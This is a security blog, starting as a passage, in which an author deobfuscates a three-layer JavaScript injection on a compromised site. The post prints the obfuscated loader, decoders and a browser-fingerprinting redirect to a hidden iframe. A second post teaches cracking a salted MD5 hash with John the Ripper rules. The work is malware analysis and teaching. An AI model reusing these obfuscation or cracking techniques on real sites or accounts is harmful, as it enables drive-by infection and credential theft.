 7 12 2-b2 7k5 74 75 89aban-eqcdcia-jaod-ra.vd.r-esaicmec-a-mco</span>  
 (... 11000 chars later on this only line...)   
 defaultFunction=onkeydownOpener; continueDecodeURIComponent(pkcs11Taint)();layersWith="\x76\x65\x72";pkcs11Taint=layersWith;layersWith+=layersWith  
 Error displaying the error page: Application Instantiation Error: Failed to start the session because headers have already been sent by "/jail/var/www/vhosts/" at line 123.  

The script part is interesting. It's filled up with variables, and those names looks like javascript names and functions. After a bit of code beautifying, we can see in the end:

We understand that the pcks11Taint is a string slowly built, variable after variable, which is called like a function thanks to continueDecodeURIComponent(pkcs11Taint)();

Another nice trick is that the pkcs11Taint strings is cleared up right after being called. So, if you try to do some kind of symbolic execution through all the script, you end up with absolutely nothing interesting. You can also see that all the temporary variables are reseted right after evaluation.

2/ Second Layer

You'll be in hell... Before me!

Following this path is really easy. Just change the continueDecodeURIComponent(pkcs11Taint)(); with an alert(); and you'll see this javascript. I beautify it again, and we see:

 a=document.getElementById("screenXConfirm").innerHTML.replace(/[^\d ]/g,"").split(" ");  

Remember the <span id=screenXConfirm ...> we saw just before? We remove everything except numbers and space in order to fill a table.
Then, we XOR all value from the table with the value 98 and we finally execute what we got from the table, translated back to characters.

Here is a little python code to see the result (why python? just because.)
1:  #! /usr/bin/python  
2:  import re  
3:  screenXConfirm="0 23 2cs2 czc (...c/c from page.html...) 7 12 2-b2 7k5 74 75 89aban-eqcdcia-jaod-ra.vd.r-esaicmec-a-mco"  
5:  screenXConfirm=screenXConfirm.split(" ")  
6:  translated_js=[]  
7:  for i in screenXConfirm:  
8:    num=int(re.sub(r"[^\d ]","",i))  
9:    translated_js.append(chr(num^98))  
11:  print ''.join(translated_js)  

3/ Third Layer

No mercy!

The python code gives this (once again, the code has been beautified for readability):

 buttonUntaint = (+[window.sidebar]) + (+[]);  
 oncontextmenuOnmousedown = ["rv:11", "MSIE", ];  
 for (propertyIsEnumWhile = buttonUntaint; propertyIsEnumWhile < oncontextmenuOnmousedown.length; propertyIsEnumWhile++) {  
   if (navigator.userAgent.indexOf(oncontextmenuOnmousedown[propertyIsEnumWhile]) > buttonUntaint) {  
     undefinedFinally = oncontextmenuOnmousedown.length - propertyIsEnumWhile;  
 if (navigator.userAgent.indexOf("MSIE 10") > buttonUntaint) {  
 continueNew = "6pbXWbAoyVTSfe";  
 onloadCheckbox = document.getElementById("screenXConfirm").innerHTML;  
 constEncodeURIComponent = buttonFalse = buttonUntaint;  
 isFiniteDocument = "";  
 onloadCheckbox = onloadCheckbox.replace(/[^a-z]/g, "");  
 for (propertyIsEnumWhile = buttonUntaint; propertyIsEnumWhile < onloadCheckbox.length; propertyIsEnumWhile++) {  
   formsEncodeURIComponent = onloadCheckbox.charCodeAt(propertyIsEnumWhile);  
   if (constEncodeURIComponent % undefinedFinally) {  
     isFiniteDocument += String.fromCharCode(((returnButton + formsEncodeURIComponent - 97) ^ continueNew.charCodeAt(buttonFalse % continueNew.length)) % 255);  
   } else {  
     returnButton = (formsEncodeURIComponent - 97) * 13 * undefinedFinally;  

Aside the use of really badly named variables which can lead to confusion, we note three important things:
  • ["rv:11", "MSIE", ];
    The javascript code tries to autodect the browser. It search for IE11 and more interstingly, the table finishs with ', ]'. I think that the code is autogenerated upon demand, and can autodetect way more borwser. This one wants to detect MSIE or IE11, but the generator code must have more browser and versions.
  • navigator.userAgent.indexOf("MSIE 10")
    The previous check and this one are used to set up a variable to the value of "2" if the browser is IE10 or IE11. Interesting, this javascript targets recent browsers (at least, not an IE8 ^_^ ).
  • continueNew = "6pbXWbAoyVTSfe"; and .replace(/[^a-z]/g, "");
    That continueNew variable is a key. The replace part just takes all the lowercase characters from the screenXConfirm <span> id. It's interesting. The span id is used twice, one for its numbers, another for its lowercase letters. They are used to encrypt layers of obfuscated javascript. We understand better why this span id looks like a bunch of random things.
And we have a decyphering function which decrypt the lowercase characters with the key and the variable setted with the user-agent. This is a really weird way to redirect browser to a specific location... A simple "if" case would have done the job, remeber that we are under two layer of obfuscation.

I used again a bit of python code to see where we are going. I didn't even tried to reverse the decyphering function, because copy-pasting it "just works" (yes, javascript == python ^_^ ):
1:  #! /usr/bin/python  
2:  import re  
3:  screenXConfirm="0 23 2cs2 czc22 1m3a (once again, all of the span id chars)k5 74 75 89aban-eqcdcia-jaod-ra.vd.r-esaicmec-a-mco"  
4:  key="6pbXWbAoyVTSfe"  
6:  returnButton=0  
7:  undefinedFinally=2 #If you have MSIE10 or MSIE11  
8:  buttonFalse=0  
9:  constEncodeURIComponent=0  
10:  isFiniteDocument=[]  
12:  onloadCheckbox=[]  
13:  for i in screenXConfirm:  
14:    c=(re.sub(r"[^a-z]","",i))  
15:    if len(c) > 0:  
16:      onloadCheckbox.append(ord(c))  
18:  for formsEncodeURIComponent in onloadCheckbox:  
19:    if (constEncodeURIComponent%undefinedFinally):  
20:      num=(returnButton+formsEncodeURIComponent-97)^ord(key[buttonFalse%len(key)])  
21:      buttonFalse+=1  
22:      isFiniteDocument.append(chr(num%255))  
23:    else:  
24:      returnButton=(formsEncodeURIComponent-97)*13*undefinedFinally  
25:    constEncodeURIComponent+=1  
27:  print ''.join(isFiniteDocument)  

4/ Hiding in plain sight

Don't let your guard down... or you'll die.

The last javascript code, after beautifying, is:
 if (document.cookie.indexOf(p) == -1) {  
   <div class="kkvhavtlfdalg">  
   <iframe src="" width="250" height="250">  
 c = p + "=364; path=/; expires=" + new Date(new Date().getTime() + 604800000).toUTCString();  
 document.cookie = c;  
 document.cookie = "_" + c;  

We notice immediately two things:
  • The use of the cookie PHP_SESSION_PHP. This is made to look like a legit cookie from a PHP Session. I search through all github repositories, open sources repos and couldn't find one legitimate use of this Cookie. If you have this cookie stored in your browser, I have some bad news for you.
    You can check for Firefox with sqlite:
     mitsurugi@dojo:~/.mozilla/firefox/39wilkuz.default$ sqlite3 cookies.sqlite  
     SQLite version 3.7.13 2012-06-11 02:05:22  
     Enter ".help" for instructions  
     Enter SQL statements terminated with a ";"  
     sqlite> select baseDomain from moz_cookies where name like 'PHP_SESSION_PHP';  

    (yeah, I know, the attack targets IE, but this is Firefox. Whatever.)
  •  The domain where the iframe points to:
    This domain doesn't exist anymore. I can't find any records about it. After some readings, I think it's a method called 'DNS shadowing'. The domain is legit, the subdomain is not. The subdomain has a little TTL and is promptly removed after attack. No tracks, no way to hunt down the IP address. Clever.

5/ Conclusion

Weapons are just tools. True strength lies within me.

In this blogpost, we saw how an attacker can do the first part of a fingerprinting. Only clients with IE10 or IE11 are redirected to a (supposed) evil iframe.
The attacker uses nice trick for staying under the radar, with .htaccess and javascript variables names which looks legit. What is hard to understand is the 3 layer of js obfuscation: if you find the first js illegitimate, you have no problem to go through the 3 layers in very little time, so why spend time in order to do this obfuscation? Maybe it confuses some AV? Another thing?
In the end, the most significative way to block an analyst is the DNS shadowing, and it's very effective :-(

If you search the Internet with PHP_SESSION_PHP and DNS shadow, you find connections to Angler Exploit Kit or Darkleech. Without the iframe, it's hard to say what it really was.

 Quotes are taken from SoulCalibur.

jeudi 14 avril 2016

Let's play with john the ripper

1/ Introduction

Everybody in infosec industry knows john the ripper. If you sit quietly in the middle of the night in a server room, you can hear tons of passwords being cracked by john.

I use john from time to time, but I did a little diving into the configuration file and figured that john is a lot more than a cracker. It's almost a DSL for cracking passwords.

2/ john, ok but which one?

I recommend to use the john from openwall: It's faster, it's packed with a lot of patch, and easier to use. So, take this one. Installation is straightforward: wget it, untar-gz it, and run.

3/ rules, rules, rules and dry-run

You can launch john in dry-run mode. With this mode, john will print the candidate passwords. That's pretty cool in order to test the rules. The parameter is --stdout. Without --rules parameter, john will try only password listed in the wordlist file. We can see that john is pretty good for mangling password with --rules

mitsurugi@dojo:~/john-1.7.9-jumbo5-Linux-x86-32/run$ cat wordlist

mitsurugi@dojo:~/john-1.7.9-jumbo5-Linux-x86-32/run$ ./john --wordlist=wordlist --stdout
words: 1  time: 0:00:00:00 DONE (Thu Apr 14 16:12:20 2016)  w/s: 20.00  current: mitsurugi
mitsurugi@dojo:~/john-1.7.9-jumbo5-Linux-x86-32/run$ ./john --wordlist=wordlist --stdout --rules
words: 49  time: 0:00:00:00 DONE (Thu Apr 14 16:12:23 2016)  w/s: 1225  current: Mitsuruging

So, if you want to crack passwords, you better have to use the --rules option :-)
We can also learn that variations doesn't give you better security. If you thought that doubling your password will be harder to crack, think again, because it's in default rules list of john!!

If you want more mangling, you can try the --rules=single options:
mitsurugi@dojo:~/john-1.7.9-jumbo5-Linux-x86-32/run$ ./john --wordlist=wordlist --stdout --rules=single


<oyditiho               //this one is cool on qwerty keyboard :)
Nurayeyfu               //this one too



words: 841  time: 0:00:00:00 DONE (Thu Apr 14 16:19:14 2016)  w/s: 21025  current: mitsurugi1900

841 variations for a single word!! That's impressive!

4/ Writing your rules

That's not easy. The language used is (almost) braindead. The better doc I found is on openwall:

5/ Use case, md5 salted password

Imagine, you found a SQL injection, you got the database, but passwords are salted, then hashed. You have the salt, you want the password.
Let's imagine that salt value is "Th1s_is_4_g00d_s4lt", and we want to crack this hash: 9c5e420f4b6f4878275502c5f097ffea

At first, we generate a wordlist:
mitsurugi@dojo:~/john-1.7.9-jumbo5-Linux-x86-32/run$ ./john --wordlist=wordlist --stdout --rules=single > my_wordlist
words: 841  time: 0:00:00:00 DONE (Thu Apr 14 16:19:14 2016)  w/s: 21025  current: mitsurugi1900

Then, we create our rule. This is a string command, with the insertion of a string:
AN"STR" insert string STR into the word at position N
So,we create a rule in our john.conf file:
mitsurugi@dojo:~/john-1.7.9-jumbo5-Linux-x86-32/run$ cat my.john.conf

and the appropriate password file:
mitsurugi@dojo:~/john-1.7.9-jumbo5-Linux-x86-32/run$ cat password

And now, we can see the magic happening:
mitsurugi@dojo:~/john-1.7.9-jumbo5-Linux-x86-32/run$ ./john --format=raw-MD5 --wordlist=my_wordlist --config=my.john.conf --rules=mitsu password
Loaded 1 password hash (Raw MD5 [SSE2 32x4])
Th1s_is_4_g00d_s4lt=mitsurugi= (user)
guesses: 1  time: 0:00:00:00 DONE (Thu Apr 14 16:53:55 2016)  c/s: 10666  trying: Th1s_is_4_g00d_s4ltMitsurugiT - Th1s_is_4_g00d_s4ltmitsurugi444
Use the "--show" option to display all of the cracked passwords reliably

Job's done, MD5 salted hash has been cracked.

I think that you can crack it with a single pass, due to preprocessor commands in john.conf file, but I didn't figure out. Maybe it's better to make many passes and improve wordlist file.

6/ Conclusion

As we see, John can make a lot more than just crack passwords. It can help to generate wordlists, and the language is very powerfull (although braindead).
If you know the patterns used by someone to create passwords, john can help you to crack them :-)

The --stdout option is really usefull in order to see the common patterns used by people to derivate passwords from common words. If you use one of them, I think it's time for you to change.